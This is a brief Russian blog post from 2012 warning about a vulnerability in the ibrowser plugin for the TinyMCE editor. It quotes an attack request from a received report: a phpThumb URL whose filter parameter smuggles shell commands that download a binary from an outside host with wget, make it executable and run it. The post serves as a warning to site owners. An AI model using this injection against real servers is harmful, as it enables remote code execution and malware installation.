Уязвимость в tinymce и ibrowser

Security

Автор: Александр Степанов

5 янв. 2012 г., 19:03:23  1351


Недавно, на почту свалился вот такой вот отчет:

/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/barbut6%20bingoooo.co.uk/barbut6;chmod%200755%20/tmp/barbut6;/tmp/barbut6;ps%20-aux;%20&phpThumbDebug=9

Хорошо, что у меня этого плагина (ibrowser) нет. Так что будьте бдительны.